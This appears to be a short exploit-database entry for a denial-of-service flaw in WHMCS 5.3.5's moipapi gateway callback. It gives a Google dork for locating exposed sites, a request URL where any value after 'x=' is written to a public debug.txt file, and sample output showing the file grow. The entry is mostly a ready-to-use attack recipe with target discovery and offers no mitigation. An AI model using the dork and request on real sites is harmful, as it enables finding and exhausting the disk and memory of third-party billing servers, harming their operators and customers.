# Exploit Title: WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5 # Google Dork: inurl:/modules/gateways/callback/moipapi.php -intext:"Gateway Module "moipapi" Not Activated" # Date: 23/7/2014 # Exploit Author: surivaton # Vendor Homepage: whmcs.com # Version: 5.3.5 # Tested on: Linux, Windows Possible denial of service with memory consumption and taking up disc space URL: www.whmcshostedsite.com/modules/gateways/callback/moipapi.php?x= Enter what ever you want after x= Writes to debug.txt in same directory: www.whmcshostedsite.com/modules/gateways/callback/debug.txt What appears in debug.txt(a tad over 200 bytes): ----------------------------------- POST received: Array ( ) |
(109)